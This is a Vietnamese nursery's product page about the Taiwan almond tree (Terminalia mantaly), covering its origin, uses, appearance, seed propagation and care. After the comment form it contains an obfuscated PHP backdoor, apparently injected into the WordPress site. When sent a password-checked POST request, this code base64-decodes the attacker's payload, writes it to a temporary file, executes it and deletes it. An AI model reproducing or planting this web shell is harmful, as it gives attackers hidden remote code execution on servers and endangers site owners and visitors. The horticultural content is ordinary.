Cây bàng Đài Loan – Cây Công Trình – Cây Bóng Mát

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cây bàng Đài Loan

Cây bàng đài loan hay còn gọi là bàng lá nhỏ, cây tiểu diệp lãm nhân thụ là một loại cây trồng lấy bóng mát ở vỉa hè, công viên,… vừa làm cho không gian thêm mát mẻ, lại vừa lọc khí độc hại, trả lại bầu không khí trong lành cho thiên nhiên

.

Đặc điểm chung của cây bàng Đài Loan

Người Việt Nam không còn xa lạ gì với cây bàng nhưng với cây bàng lá nhỏ thì sao ? Bạn đã có hiểu biết gì về loại cây này rồi, https://vuoncayhoabinh.com sẽ cung cấp cho các bạn những thông tin hữu ích về loại cây này nhé.

Tên thường gọi của loại cây lá nhỏ này là Cây bàng đại loan hay cái tên mỹ miều hơn là cây tiểu diệp lãm nhân thụ. Tên khoa học là Terminalia mantaly.

Họ Combretaceae (Bàng), xuất xứ từ Madagascar đến Senegal, Ethiopia, Kenya, Somalia, Tanzania, Uganda.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat
Cây bàng đài loan

Công dụng của cây bàng Đài Loan

Công dụng chính của loài cây này vẫn là lấy bóng mát, giúp điều hòa không khí trong lành, thanh lọc những khí độc hại, khói bụi.

 

 Kê đặt cây bàng Đài Loan như thế nào ?

Cây bàng được trồng nhiều tại các công viên, nhà nghỉ, khách sạn, khắp các vỉa hè đường phố, khu dân cư, nơi có nhiều người dân sinh sống…

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

 

Đối tượng hay sử dụng

Cây bàng đài loan chủ yếu được sử dụng bởi những người làm công trình, trồng ở khắp công viên, đường phố, các khu chung cư…

Cây có chiều cao từ 4 – 15m.

 

Đặc điểm hình thái của cây bàng Đài Loan

Đây là loại cây thân thẳng. Tán cây móc chếch đan xen vào nhau, tạo thành hình tầng vòng vô cùng đẹp mắt. Lá cây bàng nhỏ, màu xanh, mọc dày từng lớp và đan xen vào nhau, đơn nhỏ, bóng bẩy và nhẵn thín. Mép lá nguyên có màu xanh non, nhỏ li ti rất đẹp mắt. Rễ cây thuộc nhóm rễ cọc, đâm sâu vào lòng đất để hút triệt để các chất dinh dưỡng cần thiết nuôi sống cây.

 

Đặc điểm sinh lý, sinh thái của cây bàng Đài Loan

Cây bàng có tốc độ sinh trưởng nhanh nếu gặp điều kiện thích hợp, có cây đạt độ cao khủng gần 20m. Cây thích hợp nuôi trồng ở môi trường giàu chất dinh dưỡng.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

 

Lựa chọn cây bàng Đài Loan đúng cách

Tùy theo sở thích, nhu cầu của từng người có thể mua cây giống và sử dụng với nhiều mục đích như trang tí sân vườn, công viên, lấy bóng mát,…

Cách trồng cây bàng đài loan

Cây bàng đài loan được nhân giống bằng hạt, cần cắt cánh hạt trước lúc gieo, sau đó ngâm nước lã 24 tiếng. Sau khi ngâm xong, tiến hành ủ hạt giống vào túi vải, cần giữ độ ẩm đầy đủ cho túi vải, sau 2 – 3 ngày hạt nảy mầm thì đem gieo. Chuẩn bị trước bầu đất để gieo hạt, phải đảm bảo độ ẩm cao, sau đó tạo 1 lỗ trên mặt bầu đất sâu khoảng 1,5cm rồi cho 1 – 2 hạt đã ủ vào. Phủ lớp đất mỏng lên trên che hạt, thêm rơm và tạo giàn để che mát.

 

Sau khoảng 7 đến 8 tháng, cây con đạt độ cao từ 20 – 35cm thì cho xuất vườn ươm đem trồng. Cần làm rào che, tưới nước thường xuyên để cung cấp đủ độ ẩm, dưỡng cây phục hồi sinh trưởng nhanh. Có thể chủ động kiến tạo cảnh quan xanh trong quá trình chăm sóc cây bàng bằng việc cắt cành, sửa tán cây cho phù hợp với kiến trúc công trình. Nhớ theo dõi cây để bảo vệ phòng trừ sâu hại lá và ảnh hưởng đến thân, quả.

 

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

 

Kĩ thuật trồng cây bàng công trình

Cần có:

Nhóm A: cây bàng đài loan trong bầu, chiều cao dưới 1m.

Nhóm B: cây bàng đài loan đã vỡ bầu, cao dưới 2m.

Nhóm C: cây bàng đài loan đã vỡ tán ( có nhiều cành và nhánh )

Nhóm D: cây bàng đài loan đã trường thành và có thể đảo gốc, cắt tỉa cành theo yêu cầu kĩ thuật công trình cụ thể.

Chuyển cây bàng Đài Loan từ nhà vườn ra trồng tại công trình cần cung cấp rào chống, che chắn đầy đủ, tưới nước đủ ẩm dưỡng cây phục hồi sinh trưởng nhanh ( 15 – 30 ngày ). Trong quá trình chăm sóc có thể tiến hành cắt tỉa cảnh, tán cây cho phù hợp với kiến trúc công trình.

 

Cách chăm sóc cây bàng Đài Loan

Nhớ tưới nước đầy đủ cho cây, nhưng ở mức độ vừa đủ, tránh tình trạng chết vì ngập úng.

Trồng cây trong đất màu mỡ, tơi xốp, thoát nước tốt để cây phát triển nhanh.

 

Những lưu ý khi chăm sóc cây bàng đài loan

Nếu thuê cây bàng đài loan thì bạn nên để nhân viên kĩ thuật của nơi cho thuê cây tự chăm sóc theo lịch của họ.

Nếu bạn chọn mua cây thì cần nắm rõ những cách chăm sóc cơ bản sau:

Đây là loại cây ưa sáng, phát triển tốt trong điều kiện đất màu mỡ.

 

Cây được trồng bằng hạt, cần ngâm hạt trước khi gieo mầm, cắt cành trước khoảng 24h.

Cần cắt bỏ lá vàng, lá úa, lá héo.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat

 

Bạn nên chăm sóc đặc biệt những cây bị rụng lá hoặc các nhánh cây có hiện tượng mềm, rục.

Trên đây là những thông tin bạn cần biết về cây bàng Đài Loan mà https://vuoncayhoabinh.com cung cấp cho các bạn. Chúc các bạn nắm rõ hiểu biết để trồng và chăm sóc được cây bàng Đài Loan hiệu quả.

 

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}